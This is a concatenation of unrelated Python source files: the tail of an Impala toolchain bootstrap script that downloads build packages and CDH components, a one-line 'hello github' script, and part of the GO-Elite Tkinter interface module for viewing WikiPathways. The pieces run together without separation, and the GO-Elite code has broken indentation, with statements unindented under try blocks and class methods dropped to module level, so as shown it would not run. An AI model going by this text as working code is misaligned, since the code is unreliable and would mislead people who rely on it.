      raise Exception("Unable to extract soname from %s" % client_lib_path)
    # Compile the library.
    stub_client_lib_path = os.path.join(stub_build_dir, "libkudu_client.so")
    subprocess.check_call(["g++", stub_client_src_file.name, "-shared", "-fPIC",
        "-Wl,-soname,%s" % so_name, "-o", stub_client_lib_path])
    # Replace the real libs with the stub.
    for client_lib_path in client_lib_paths:
      shutil.copyfile(stub_client_lib_path, client_lib_path)
  finally:
    shutil.rmtree(stub_build_dir)
def execute_many(f, args):
  """
  Executes f(a) for a in args. If possible, uses a threadpool
  to execute in parallel. The pool uses the number of CPUs
  in the system as the default size.
  """
  try:
    import multiprocessing.pool
  except ImportError:
    # multiprocessing was introduced in Python 2.6.
    # For older Pythons (CentOS 5), degrade to single-threaded execution:
    return [f(a) for a in args]
  workers = min(multiprocessing.cpu_count(), 4)
  pool = multiprocessing.pool.ThreadPool(processes=workers)
  return pool.map(f, args, 1)
def download_cdh_components(toolchain_root, cdh_components):
  """Downloads and unpacks the CDH components into $CDH_COMPONENTS_HOME if not found."""
  cdh_components_home = os.environ.get("CDH_COMPONENTS_HOME")
  if not cdh_components_home:
    logging.error("Impala environment not set up correctly, make sure "
        "$CDH_COMPONENTS_HOME is present.")
    sys.exit(1)
  # Create the directory where CDH components live if necessary.
  if not os.path.exists(cdh_components_home):
    os.makedirs(cdh_components_home)
  # The URL prefix of where CDH components live in S3.
  download_path_prefix = HOST + "/cdh_components/"
  def download(component):
    # Skip components already extracted; otherwise fetch and unpack them.
    pkg_directory = package_directory(cdh_components_home, component.name,
        component.version)
    if os.path.isdir(pkg_directory):
      return
    # Download the package if it doesn't exist
    file_name = "{0}-{1}.tar.gz".format(component.name, component.version)
    if component.url is None:
      download_path = download_path_prefix + file_name
    else:
      download_path = component.url
    wget_and_unpack_package(download_path, file_name, cdh_components_home, False)
  execute_many(download, cdh_components)
if __name__ == "__main__":
  """Validates the presence of $IMPALA_HOME and $IMPALA_TOOLCHAIN in the environment.-
  By checking $IMPALA_HOME is present, we assume that IMPALA_{LIB}_VERSION will be present
  as well. Will create the directory specified by $IMPALA_TOOLCHAIN if it doesn't exist
  yet. Each of the packages specified in `packages` is downloaded and extracted into
  $IMPALA_TOOLCHAIN. If $DOWNLOAD_CDH_COMPONENTS is true, this function will also download
  the CDH components (i.e. hadoop, hbase, hive, llama, llama-minikidc and sentry) into the
  directory specified by $CDH_COMPONENTS_HOME.
  """
  logging.basicConfig(level=logging.INFO,
      format='%(asctime)s %(threadName)s %(levelname)s: %(message)s')
  # 'sh' module logs at every execution, which is too noisy
  logging.getLogger("sh").setLevel(logging.WARNING)
  if not os.environ.get("IMPALA_HOME"):
    logging.error("Impala environment not set up correctly, make sure "
        "impala-config.sh is sourced.")
    sys.exit(1)
  # Create the destination directory if necessary
  toolchain_root = os.environ.get("IMPALA_TOOLCHAIN")
  if not toolchain_root:
    logging.error("Impala environment not set up correctly, make sure "
        "$IMPALA_TOOLCHAIN is present.")
    sys.exit(1)
  if not os.path.exists(toolchain_root):
    os.makedirs(toolchain_root)
  # LLVM and Kudu are the largest packages. Sort them first so that
  # their download starts as soon as possible.
  # NOTE: map() returning a list (and the .insert below) requires Python 2,
  # consistent with the `except Exception, e` syntax used elsewhere here.
  packages = map(Package, ["llvm", "kudu",
      "avro", "binutils", "boost", "breakpad", "bzip2", "cmake", "crcutil",
      "flatbuffers", "gcc", "gflags", "glog", "gperftools", "gtest", "libev",
      "lz4", "openldap", "openssl", "protobuf",
      "rapidjson", "re2", "snappy", "thrift", "tpc-h", "tpc-ds", "zlib"])
  # An extra asserts-enabled LLVM build is always fetched as well.
  packages.insert(0, Package("llvm", "3.9.1-asserts"))
  bootstrap(toolchain_root, packages)
  # Download the CDH components if necessary.
  if os.getenv("DOWNLOAD_CDH_COMPONENTS", "false") == "true":
    cdh_components = map(Package, ["hadoop", "hbase", "hive", "llama-minikdc", "sentry"])
    download_cdh_components(toolchain_root, cdh_components)
|
# First-commit greeting script.
greeting = 'hello github!i\"m coming!'
print(greeting)
###UI
#Copyright 2005-2008 J. David Gladstone Institutes, San Francisco California
#Author Nathan Salomonis - nsalomonis@gmail.com
#Permission is hereby granted, free of charge, to any person obtaining a copy
#of this software and associated documentation files (the "Software"), to deal
#in the Software without restriction, including without limitation the rights
#to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
#copies of the Software, and to permit persons to whom the Software is furnished
#to do so, subject to the following conditions:
#THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED,
#INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A
#PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
#HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
#OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
#SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""This module contains fairly generic routines for reading in user interface (UI) instructions from
an existing configuration options file (options.txt), buiding those interfaces, downloading and/or
processing files."""
import math
import statistics
import sys, string
import os.path, platform
import time
import webbrowser
import shutil
import update; reload(update)
import BuildAffymetrixAssociations; reload(BuildAffymetrixAssociations)
import gene_associations; reload(gene_associations)
import export
import unique
import OBO_import
import datetime
import traceback
try:
import WikiPathways_webservice
except Exception:
print 'WikiPathways visualization not supported (requires installation of suds)'
try:
from PIL import Image as PIL_Image
import ImageTk
except Exception:
print 'Python Imaging Library not installed... using default PNG viewer'
from sys import argv
try:
import Tkinter
from Tkinter import *
import PmwFreeze
from Tkconstants import LEFT
import tkMessageBox
import tkFileDialog
except ImportError: print "\nPmw or Tkinter not found... proceeding with manual input"
# Platform/diagnostic flags used throughout the module ('yes'/'no' strings).
# 'posix' covers Mac and Linux; toggles Mac-specific print handling below.
mac_print_mode = 'no'
if os.name == 'posix': mac_print_mode = 'yes' #os.name is 'posix', 'nt', 'os2', 'mac', 'ce' or 'riscos'
debug_mode = 'no'
def filepath(filename):
    """Resolve ``filename`` through the project's unique.filepath helper."""
    return unique.filepath(filename)
def osfilepath(filename):
    """Resolve the path, then normalize backslashes to forward slashes."""
    fn = filepath(filename)
    # Python 2 string-module call: replaces every '\' with '/'.
    fn = string.replace(fn,'\\','/')
    return fn
def read_directory(sub_dir):
    """List data files (.txt/.csv or containing .zip/.obo/.ontology) in
    sub_dir, excluding folder names."""
    ###Code to prevent folder names from being included
    kept = []
    for entry in unique.read_directory(sub_dir):
        if (entry[-4:] == ".txt" or entry[-4:] == ".csv" or ".zip" in entry
                or '.obo' in entry or '.ontology' in entry):
            kept.append(entry)
    return kept
def readDirText(sub_dir):
    """List only .txt files in sub_dir, excluding folder names."""
    ###Code to prevent folder names from being included
    return [entry for entry in unique.read_directory(sub_dir)
            if entry[-4:] == ".txt"]
def getFolders(sub_dir):
    """List entries that look like folders (not .txt/.csv and not containing
    .zip) in sub_dir."""
    ###Only get folder names
    return [entry for entry in unique.read_directory(sub_dir)
            if entry[-4:] != ".txt" and entry[-4:] != ".csv" and ".zip" not in entry]
def returnDirectoriesNoReplace(dir):
    """Return extension-less entries (treated as directories) from the
    unmodified directory listing."""
    return [entry for entry in unique.returnDirectoriesNoReplace(dir)
            if '.' not in entry]
def returnFilesNoReplace(dir):
    """Return entries containing a '.' (treated as files) from the listing."""
    # NOTE(review): this calls unique.returnDirectoriesNoReplace -- the same
    # helper as the Directories variant above, not a Files-specific one.
    # Possibly intentional reuse of the raw listing; verify against `unique`.
    dir_list = unique.returnDirectoriesNoReplace(dir); dir_list2 = []
    for entry in dir_list:
        if '.' in entry: dir_list2.append(entry)
    return dir_list2
def cleanUpLine(line):
    """Strip newline/carriage-return characters, literal backslash-c pairs,
    and double quotes from a line read from a file."""
    # Python 2 string-module calls; '\c' below is a literal backslash + 'c'.
    line = string.replace(line,'\n','')
    line = string.replace(line,'\c','')
    data = string.replace(line,'\r','')
    data = string.replace(data,'"','')
    return data
################# GUI #################
def wait(seconds):
    ### stalls the analysis for the designated number of seconds (allows time to print something to the GUI)
    # IMPROVEMENT: the original busy-waited (`while diff<seconds` polling
    # time.time()), pegging a CPU core for the whole interval; time.sleep()
    # blocks for the same duration without spinning.
    time.sleep(seconds)
class GUI:
    def ViewWikiPathways(self):
        """ Canvas is already drawn at this point from __init__ """
        # Builds the WikiPathways viewer screen: species dropdown, MOD
        # dropdown, input-file picker, and Display/Back/Quit/Help buttons,
        # then enters the Tk main loop.
        global pathway_db
        pathway_db={}
        button_text = 'Help'
        ### Create a species drop-down option that can be updated
        current_species_names = getSpeciesList()
        self.title = 'Select species to search for WikiPathways '
        self.option = 'species_wp'
        self.options = ['---']+current_species_names #species_list
        self.default_option = 0
        self.dropDown()
        ### Create a label that can be updated below the dropdown menu
        self.label_name = StringVar()
        self.label_name.set('Pathway species list may take several seconds to load')
        self.invokeLabel() ### Invoke a new label indicating that the database is loading
        ### Create a MOD selection drop-down list
        null,system_list,mod_list = importSystemInfo()
        self.title = 'Select the ID system to translate to (MOD)'
        self.option = 'mod_wp'
        self.options = mod_list
        try: self.default_option = mod_list.index('Ensembl') ### Get the Ensembl index number
        except Exception: self.default_option = 0
        self.dropDown()
        ### Create a file selection option
        self.title = 'Select GO-Elite input ID text file'
        self.notes = 'note: ID file must have a header row and at least three columns:\n'
        self.notes += '(1) Identifier, (2) System Code, (3) Value to map (- OR +)\n'
        self.file_option = 'goelite_input_file'
        self.directory_type = 'file'
        self.FileSelectionMenu()
        # Action buttons (note: "dispaly" spelling kept from the original).
        dispaly_pathway = Button(text = 'Display Pathway', command = self.displayPathway)
        dispaly_pathway.pack(side = 'right', padx = 10, pady = 10)
        back_button = Button(self._parent, text="Back", command=self.goBack)
        back_button.pack(side = 'right', padx =10, pady = 5)
        quit_win = Button(self._parent, text="Quit", command=self.quit)
        quit_win.pack(side = 'right', padx =10, pady = 5)
        # Prefer the rich help window; fall back to opening a link on error.
        try: help_button = Button(self._parent, text=button_text, command=self.GetHelpTopLevel); help_button.pack(side = 'left', padx = 5, pady = 5)
        except Exception: help_button = Button(self._parent, text=button_text, command=self.linkout); help_button.pack(side = 'left', padx = 5, pady = 5)
        self._parent.protocol("WM_DELETE_WINDOW", self.deleteWindow)
        self._parent.mainloop()
    def FileSelectionMenu(self):
        """Render a labeled group with a path entry field plus a 'select'
        button wired to self.getPath; registers the chosen path under
        self.file_option in self.pathdb / self._user_variables."""
        option = self.file_option
        group = PmwFreeze.Group(self.parent_type,tag_text = self.title)
        group.pack(fill = 'both', expand = 1, padx = 10, pady = 2)
        def filecallback(callback=self.callback,option=option): self.getPath(option)
        default_option=''
        entrytxt = StringVar(); #self.entrytxt.set(self.default_dir)
        entrytxt.set(default_option)
        # Track the Tk variable so other methods can read/update the path.
        self.pathdb[option] = entrytxt
        self._user_variables[option] = default_option
        entry = Entry(group.interior(),textvariable=self.pathdb[option]);
        entry.pack(side='left',fill = 'both', expand = 0.7, padx = 10, pady = 2)
        button = Button(group.interior(), text="select "+self.directory_type, width = 10, fg="red", command=filecallback)
        button.pack(side=LEFT, padx = 2,pady = 2)
        if len(self.notes)>0: ln = Label(self.parent_type, text=self.notes,fg="blue"); ln.pack(padx = 10)
    def dropDown(self):
        """Render a Pmw OptionMenu for self.options titled self.title and
        immediately invoke self.default_option via self.callbackWP."""
        def comp_callback(tag,callback=self.callbackWP,option=self.option):
            callback(tag,option)
        self.comp = PmwFreeze.OptionMenu(self.parent_type,
            labelpos = 'w', label_text = self.title, items = self.options, command = comp_callback)
        if self.option == 'wp_id_selection':
            self.wp_dropdown = self.comp ### update this variable later (optional)
        self.comp.pack(anchor = 'w', padx = 10, pady = 0)
        self.comp.invoke(self.default_option) ###Just pick the first option
def comboBox(self):
    """ Alternative, more sophisticated UI than dropDown (OptionMenu).
    Although it behaves similiar it requires different parameters, can not be
    as easily updated with new lists (different method) and requires explict
    invokation of callback when a default is set rather than selected. """
    def comp_callback(tag,callback=self.callbackWP,option=self.option):
        callback(tag,option)
    self.comp = PmwFreeze.ComboBox(self.parent_type,
        labelpos = 'w', dropdown=1, label_text = self.title,
        unique = 0, history = 0,
        scrolledlist_items = self.options, selectioncommand = comp_callback)
    # Clicking the entry opens the scrolled list, making the field act read-only
    try: self.comp.component('entryfield_entry').bind('<Button-1>', lambda event, self=self: self.comp.invoke())
    except Exception: None ### Above is a slick way to force the entry field to be disabled and invoke the scrolledlist
    if self.option == 'wp_id_selection':
        self.wp_dropdown = self.comp ### update this variable later (optional)
    self.comp.pack(anchor = 'w', padx = 10, pady = 0)
    self.comp.selectitem(self.default_option) ###Just pick the first option
    # selectitem does not fire selectioncommand, so invoke the callback manually
    self.callbackWP(self.options[0],self.option) ### Explicitly, invoke first option (not automatic)
def invokeLabel(self):
    """Pack a blue label, text-bound to self.label_name, into the parent frame."""
    widget = Label(self.parent_type, textvariable=self.label_name, fg="blue")
    self.label_object = widget
    widget.pack(padx=10)
def invokeStatusLabel(self):
    """Pack a blue status label, text-bound to self.label_status_name."""
    widget = Label(self.parent_type, textvariable=self.label_status_name, fg="blue")
    self.label_object = widget
    widget.pack(padx=10)
def enterMenu(self):
    """Create a Pmw EntryField for free-text input (e.g. a WPID), validated
    by self.custom_validate; preceded by an optional note label when
    self.notes is non-empty."""
    if len(self.notes)>0:
        lb = Label(self.parent_type, text=self.notes,fg="black"); lb.pack(pady = 5)
    ### Create and pack a horizontal RadioSelect widget
    # option bound via default arg; Pmw calls validate with the entry text
    def custom_validate(tag,custom_validate=self.custom_validate,option=self.option):
        validate = custom_validate(tag,self.option)
    self.entry_field = PmwFreeze.EntryField(self.parent_type,
        labelpos = 'w', label_text = self.title, validate = custom_validate,
        value = self.default_option, hull_borderwidth = 2)
    self.entry_field.pack(fill = 'x', expand = 0.7, padx = 10, pady = 5)
def displayPathway(self):
    """Color the selected WikiPathway with the user's input data via the
    WikiPathways webservice and display the resulting PNG.

    A manually entered WPID takes precedence over the dropdown selection
    (which is mapped back to its WPID through self.pathway_db).  Errors are
    logged to webservice.log and translated into user-facing messages by
    pattern-matching the traceback text.
    """
    filename = self._user_variables['goelite_input_file']
    mod_type = self._user_variables['mod_wp']
    species = self._user_variables['species_wp']
    pathway_name = self._user_variables['wp_id_selection']
    wpid_selected = self._user_variables['wp_id_enter']
    species_code = species_codes[species].SpeciesCode()
    wpid = None
    if len(wpid_selected)>0:
        wpid = wpid_selected
    elif len(self.pathway_db)>0:
        # Reverse-lookup the WPID for the selected pathway display name
        for wpid in self.pathway_db:
            if pathway_name == self.pathway_db[wpid].WPName():
                break
    if len(filename)==0:
        print_out = 'Select an input ID file with values first'
        WarningWindow(print_out,'Error Encountered!')
    else:
        try:
            self.graphic_link = WikiPathways_webservice.visualizePathwayAssociations(filename,species_code,mod_type,wpid)
            self.wp_status = 'Pathway images colored and saved to disk by webservice\n(see image title for location)'
            self.label_status_name.set(self.wp_status)
            # Prefer the in-app viewer; fall back to the OS default image viewer
            try: self.viewPNGFile() ### ImageTK PNG viewer
            except Exception:
                try: self.openPNGImage() ### OS default PNG viewer
                except Exception:
                    self.wp_status = 'Unable to open PNG file using operating system'
                    self.label_status_name.set(self.wp_status)
        except Exception,e:
            # Best-effort append of the traceback to a local log file
            try:
                wp_logfile = filepath('webservice.log')
                wp_report = open(wp_logfile,'a')
                wp_report.write(traceback.format_exc())
            except Exception:
                None
            try:
                print traceback.format_exc()
            except Exception:
                null=None ### Occurs when transitioning back from the Official Database download window (not sure why) -- should be fixed in 1.2.5 (sys.stdout not re-routed)
            # Map known failure signatures in the traceback to friendly messages
            if 'force_no_matching_error' in traceback.format_exc():
                print_out = 'None of the input IDs mapped to this pathway'
            elif 'force_invalid_pathway' in traceback.format_exc():
                print_out = 'Invalid pathway selected'
            elif 'IndexError' in traceback.format_exc():
                print_out = 'Input ID file does not have at least 3 columns, with the second column being system code'
            elif 'ValueError' in traceback.format_exc():
                print_out = 'Input ID file error. Please check that you do not have extra rows with no data'
            elif 'source_data' in traceback.format_exc():
                print_out = 'Input ID file does not contain a valid system code'
            else:
                print_out = 'Error generating the pathway "%s"' % pathway_name
            WarningWindow(print_out,'Error Encountered!')
def getSpeciesPathways(self, species_full):
    """Fetch all WikiPathways for a species, cache the raw db on
    self.pathway_db, and return the sorted unique pathway names."""
    self.pathway_db = WikiPathways_webservice.getAllSpeciesPathways(species_full)
    names = [self.pathway_db[wp_id].WPName() for wp_id in self.pathway_db]
    names = unique.unique(names)
    names.sort()
    return names
def callbackWP(self, tag, option):
    """Selection callback for the WikiPathways visualization window.

    Records tag under option; when a species is chosen ('species_wp') it
    loads that species' pathways from the webservice and either updates the
    existing pathway ComboBox or builds the pathway-selection widgets on
    first use.  Selecting a pathway ('wp_id_selection') clears any manually
    entered WPID so the two inputs cannot conflict.
    """
    #print 'Button',[option], tag,'was pressed.'
    self._user_variables[option] = tag
    if option == 'species_wp':
        ### Add additional menu options based on user selection
        if tag != '---':
            ### If this already exists from an earlier iteration
            hault = False
            self.label_name.set('Loading available WikiPathways')
            try:
                self.pathway_list=self.getSpeciesPathways(tag)
                traceback_printout = ''
            except Exception,e:
                # Classify the webservice failure from the traceback text
                if 'not supported' in traceback.format_exc():
                    print_out = 'Species not available at WikiPathways'
                    WarningWindow(print_out,'Species Not Found!')
                    traceback_printout=''
                    hault = True
                elif 'URLError' in traceback.format_exc():
                    print_out = 'Internet connection could not be established'
                    WarningWindow(print_out,'Internet Error')
                    traceback_printout=''
                    hault = True
                else:
                    traceback_printout = traceback.format_exc()
                try:
                    if len(self.pathway_list)>0: ### When true, a valid species was selected in a prior interation invoking the WP fields (need to repopulate)
                        hault = False
                except Exception: None
                self.pathway_list = ['None']; self.pathway_db={}
            self.label_name.set('')
            if hault == False:
                try:
                    ### If the species specific wikipathways drop down exists, just update it
                    self.wp_dropdown._list.setlist(self.pathway_list)
                    self.wp_dropdown.selectitem(self.pathway_list[0])
                    self.callbackWP(self.pathway_list[0],'wp_id_selection')
                except Exception:
                    ### Create a species specific wikipathways drop down
                    self.option = 'wp_id_selection'
                    self.title = 'Select WikiPathways to visualize your data'
                    if len(traceback_printout)>0:
                        self.title += traceback_printout ### Display the actual problem in the GUI (sloppy but efficient way for users to indicate the missing driver)
                    self.options = self.pathway_list
                    self.default_option = 0
                    self.comboBox() ### Better UI for longer lists of items (dropDown can't scroll on Linux)
                    ### Create a species specific wikipathways ID enter option
                    self.notes = 'OR'
                    self.option = 'wp_id_enter'
                    self.title = 'Enter the WPID (example: WP254) '
                    self.default_option = ''
                    self.enterMenu()
                    try:
                        ### Create a label that can be updated below the dropdown menu
                        self.wp_status = 'Pathway image may take several seconds to a minute to load...\n'
                        self.wp_status += '(images saved to "WikiPathways" folder in input directory)'
                        try: self.label_status_name.set(self.wp_status)
                        except Exception:
                            self.label_status_name = StringVar()
                            self.label_status_name.set(self.wp_status)
                        self.invokeStatusLabel() ### Invoke a new label indicating that the database is loading
                    except Exception:
                        None
    if option == 'wp_id_selection':
        ### Reset any manually input WPID if a new pathway is selected from dropdown
        try: self.entry_field.setentry('')
        except Exception: null=[]
def viewPNGFile(self):
    """ View PNG file within a PMW Tkinter frame """
    # Imported here deliberately: an ImportError must fire BEFORE the
    # Toplevel is created so the caller can fall back to the OS viewer.
    import ImageTk
    png_path = self.graphic_link['WP']
    photo = ImageTk.PhotoImage(file=png_path)
    window = Toplevel()
    scrolled = PmwFreeze.ScrolledFrame(window, labelpos='n', label_text='',
                                       usehullsize=1, hull_width=800, hull_height=550)
    scrolled.pack(padx=0, pady=0, fill='both', expand=1)
    inner = scrolled.interior()
    window.title(png_path)
    canvas = Canvas(inner)
    canvas.pack(fill=BOTH, padx=0, pady=0)
    canvas.config(width=photo.width(), height=photo.height())
    canvas.create_image(2, 2, image=photo, anchor=NW)
    window.mainloop()
def openPNGImage(self):
    """Open the colored WikiPathways PNG with the platform's default viewer."""
    quoted = '"' + self.graphic_link['WP'] + '"'
    if os.name == 'nt':
        try:
            os.startfile(quoted)
        except Exception:
            os.system('open ' + quoted)
    elif 'darwin' in sys.platform:
        os.system('open ' + quoted)
    elif 'linux' in sys.platform:
        os.system('xdg-open ' + quoted)
def __init__(self, parent, option_db, option_list):
    """Build the main GO-Elite options window.

    parent      -- Tk root/Toplevel to populate
    option_db   -- dict of option-name -> option-descriptor objects (Display,
                   Description, DisplayObject, AnalysisOptions, DefaultOption),
                   or the string 'ViewWikiPathways' for the WP viewer layout
    option_list -- ordered option names to render; each is dispatched to a
                   widget type (radio/button/folder/file/drop-down/comboBox/
                   label/enter/checkbox) based on its descriptor

    Runs the Tk mainloop; selections accumulate in self._user_variables
    (readable via Results()).
    """
    self._parent = parent; self._option_list = option_list
    self._user_variables = user_variables
    self.default_dir = PathDir; self.default_file = PathFile
    self.option_db = option_db
    # Banner icon at the top of the window
    filename = 'Config/icon.gif'
    fn=filepath(filename); img = PhotoImage(file=fn)
    can = Canvas(parent); can.pack(side='top'); can.config(width=img.width(), height=img.height())
    can.create_image(2, 2, image=img, anchor=NW)
    self.pathdb={}; use_scroll = 'no'
    label_text_str = "\nGO-Elite Program Options"
    # Window geometry tuned per platform / window type
    if os.name == 'nt': height = 400; width = 420
    else: height = 350; width = 480
    if option_db == 'ViewWikiPathways': width = 520
    use_scroll = 'yes'
    if 'run_from_scratch' in option_list or 'modifyDBs1' in option_list:
        if 'modifyDBs1' in option_list and os.name != 'nt': width = 460; height = 350
        else: width = 400; height = 325
    if 'selected_species3' in option_list:
        height -= 30
        if os.name != 'nt':height+=50; width+=50
    self.sf = PmwFreeze.ScrolledFrame(self._parent,
        labelpos = 'n', label_text = label_text_str,
        usehullsize = 1, hull_width = width, hull_height = height)
    self.sf.pack(padx = 5, pady = 1, fill = 'both', expand = 1)
    self.frame = self.sf.interior()
    parent_type = self.frame
    self.parent_type = parent_type
    i = 0; object_directions = ['top','bottom','up','down']
    if option_db == 'ViewWikiPathways':
        self.ViewWikiPathways()
    for option in option_list:
        if option in self.option_db:
            od = self.option_db[option]; self.title = od.Display(); description = od.Description()
            self.display_options = od.AnalysisOptions()
            if 'radio' in od.DisplayObject() and self.display_options != ['NA']:
                ### Create and pack a RadioSelect widget, with radiobuttons.
                self._option = option
                def radiocallback(tag,callback=self.callback,option=option): callback(tag,option)
                radiobuttons = PmwFreeze.RadioSelect(parent_type,
                    buttontype = 'radiobutton', orient = 'vertical',
                    labelpos = 'w', command = radiocallback, label_text = self.title,
                    hull_borderwidth = 2, hull_relief = 'ridge',
                    );
                if description in object_directions: direction = description ### can be used to store directions
                else: direction = 'top'
                radiobuttons.pack(side = direction, expand = 1, padx = 10, pady = 5)
                ### print self.display_options
                ### Add some buttons to the radiobutton RadioSelect.
                for text in self.display_options:
                    if text != ['NA']: radiobuttons.add(text)
                self.default_option = od.DefaultOption()
                radiobuttons.invoke(self.default_option)
            if 'button' in od.DisplayObject() and self.display_options != ['NA']:
                self._option = option
                ### Create and pack a horizontal RadioSelect widget.
                self.default_option = od.DefaultOption()
                if mac_print_mode == 'yes':
                    button_type = 'radiobutton'
                    if self._option == 'run_from_scratch':
                        self.title = self.title[:int(len(self.title)/1.8)] ### On a mac, the spaced text is too far out
                    if self._option == 'modifyDBs1':
                        self.title = self.title[:int(len(self.title)/1.3)] ### On a mac, the spaced text is too far out
                else: button_type = 'button'
                def buttoncallback(tag,callback=self.callback,option=option):
                    callback(tag,option)
                horiz = PmwFreeze.RadioSelect(parent_type, buttontype = button_type, orient = 'vertical',
                    labelpos = 'w', command = buttoncallback,
                    label_text = self.title, frame_borderwidth = 2,
                    frame_relief = 'ridge'
                    ); horiz.pack(fill = 'x', padx = 10, pady = 10)
                ### Add some buttons to the horizontal RadioSelect
                for text in self.display_options:
                    if text != ['NA']: horiz.add(text)
                horiz.invoke(self.default_option)
            if ('folder' in od.DisplayObject() or 'file' in od.DisplayObject()) and self.display_options != ['NA']:
                proceed = 'yes'
                if option == 'mappfinder_dir' and run_mappfinder == 'yes': proceed = 'no'
                if proceed == 'yes':
                    self._option = option
                    if option == 'output_dir':
                        if run_mappfinder == 'no':
                            notes = ""#"note: if not selected, 'input/MAPPFinder' will\nbe used and results written to 'output/' "
                            self.title = string.replace(self.title,'output','pre-computed ORA')
                        else: notes = od.Description()
                    else: notes = od.Description()
                    group = PmwFreeze.Group(parent_type,tag_text = self.title)
                    group.pack(fill = 'both', expand = 1, padx = 10, pady = 2)
                    def filecallback(callback=self.callback,option=option): self.getPath(option)
                    entrytxt = StringVar(); #self.entrytxt.set(self.default_dir)
                    default_option = string.replace(od.DefaultOption(),'---','')
                    entrytxt.set(default_option)
                    self.pathdb[option] = entrytxt
                    self._user_variables[option] = default_option
                    #l = Label(group.interior(), text=self.title); l.pack(side=LEFT)
                    entry = Entry(group.interior(),textvariable=self.pathdb[option]);
                    entry.pack(side='left',fill = 'both', expand = 1, padx = 10, pady = 2)
                    button = Button(group.interior(), text="select "+od.DisplayObject(), width = 10, fg="red", command=filecallback)
                    button.pack(side=LEFT, padx = 2,pady = 2)
                    #print option,run_mappfinder, self.title, self.default_option
                    if len(notes)>0: ln = Label(parent_type, text=notes,fg="blue"); ln.pack(padx = 10)
            if 'drop-down' in od.DisplayObject() and self.display_options != ['NA']:
                self._option = option
                self.default_option = self.display_options
                def comp_callback1(tag,callback=self.callback,option=option):
                    callback(tag,option)
                self.comp = PmwFreeze.OptionMenu(parent_type,
                    labelpos = 'w', label_text = self.title,
                    items = self.default_option, command = comp_callback1)
                # Species menus are kept on named attributes so callback() can
                # repopulate them when the database version changes
                if 'species' in option:
                    if 'selected_species2' in option:
                        self.speciescomp2 = self.comp; self.speciescomp2.pack(anchor = 'w', padx = 10, pady = 0)
                    elif 'selected_species3' in option:
                        self.speciescomp3 = self.comp; self.speciescomp3.pack(anchor = 'w', padx = 10, pady = 0)
                    else: self.speciescomp = self.comp; self.speciescomp.pack(anchor = 'w', padx = 10, pady = 0)
                    try: self.speciescomp.invoke(od.DefaultOption()) ###Just pick the first option
                    except Exception: self.speciescomp.invoke(self.default_option[0])
                else:
                    self.comp.pack(anchor = 'w', padx = 10, pady = 0)
                    try: self.comp.invoke(od.DefaultOption()) ###Just pick the first option
                    except Exception: self.comp.invoke(self.default_option[0])
                if len(od.Description())>0 and od.Description() != 'top':
                    ln = Label(parent_type, text=od.Description(),fg="blue"); ln.pack(padx = 10)
                if option == 'selected_version':
                    notes = 'Note: Available species may vary based on database selection and\n'
                    notes+= '"Plus" versions have additional Affymetrix & EntrezGene relationships\n'
                    ln = Label(parent_type, text=notes,fg="blue"); ln.pack(padx = 10)
            if 'comboBox' in od.DisplayObject() and self.display_options != ['NA']:
                self._option = option
                self.default_option = self.display_options
                def comp_callback1(tag,callback=self.callbackComboBox,option=option):
                    callback(tag,option)
                self.comp = PmwFreeze.ComboBox(parent_type,
                    labelpos = 'w', dropdown=1, label_text = self.title,
                    unique = 0, history = 0,
                    scrolledlist_items = self.default_option,
                    selectioncommand = comp_callback1)
                if 'species' in option:
                    if 'selected_species2' in option:
                        self.speciescomp2 = self.comp; self.speciescomp2.pack(anchor = 'w', padx = 10, pady = 0)
                        try: self.speciescomp2.component('entryfield_entry').bind('<Button-1>', lambda event, self=self: self.speciescomp2.invoke())
                        except Exception: None ### Above is a slick way to force the entry field to be disabled and invoke the scrolledlist
                        # selectitem does not fire the callback, so call it explicitly
                        try:
                            self.speciescomp2.selectitem(od.DefaultOption())
                            self.callbackComboBox(od.DefaultOption(),option)
                        except Exception:
                            self.speciescomp2.selectitem(self.default_option[0]) ###Just pick the first option
                            self.callbackComboBox(self.default_option[0],option)
                    elif 'selected_species3' in option:
                        self.speciescomp3 = self.comp; self.speciescomp3.pack(anchor = 'w', padx = 10, pady = 0)
                        try: self.speciescomp3.component('entryfield_entry').bind('<Button-1>', lambda event, self=self: self.speciescomp3.invoke())
                        except Exception: None ### Above is a slick way to force the entry field to be disabled and invoke the scrolledlist
                        try:
                            self.speciescomp3.selectitem(od.DefaultOption()) ###Just pick the first option
                            self.callbackComboBox(od.DefaultOption(),option)
                        except Exception:
                            self.speciescomp3.selectitem(self.default_option[0])
                            self.callbackComboBox(self.default_option[0],option)
                    else:
                        self.speciescomp = self.comp; self.speciescomp.pack(anchor = 'w', padx = 10, pady = 0)
                        try: self.speciescomp.component('entryfield_entry').bind('<Button-1>', lambda event, self=self: self.speciescomp.invoke())
                        except Exception: None ### Above is a slick way to force the entry field to be disabled and invoke the scrolledlist
                        try:
                            self.speciescomp.selectitem(od.DefaultOption())
                            self.callbackComboBox(od.DefaultOption(),option)
                        except Exception:
                            self.speciescomp.selectitem(self.default_option[0])
                            self.callbackComboBox(self.default_option[0],option)
                else:
                    self.combo = self.comp ### has to be a unique combo box to refer to itself in the component call below
                    self.combo.pack(anchor = 'w', padx = 10, pady = 1)
                    try: self.combo.component('entryfield_entry').bind('<Button-1>', lambda event, self=self: self.combo.invoke())
                    except Exception: None ### Above is a slick way to force the entry field to be disabled and invoke the scrolledlist
                    try:
                        self.combo.selectitem(od.DefaultOption())
                        self.callbackComboBox(od.DefaultOption(),option)
                    except Exception:
                        self.combo.selectitem(self.default_option[0])
                        self.callbackComboBox(self.default_option[0],option)
                if len(od.Description())>0 and od.Description() != 'top':
                    ln = Label(parent_type, text=od.Description(),fg="blue"); ln.pack(padx = 10)
                if option == 'selected_version':
                    notes = 'Note: Available species may vary based on database selection and\n'
                    notes+= '"Plus" versions have additional Affymetrix & EntrezGene relationships\n'
                    ln = Label(parent_type, text=notes,fg="blue"); ln.pack(padx = 10)
            if 'label' in od.DisplayObject() and self.display_options != ['NA']:
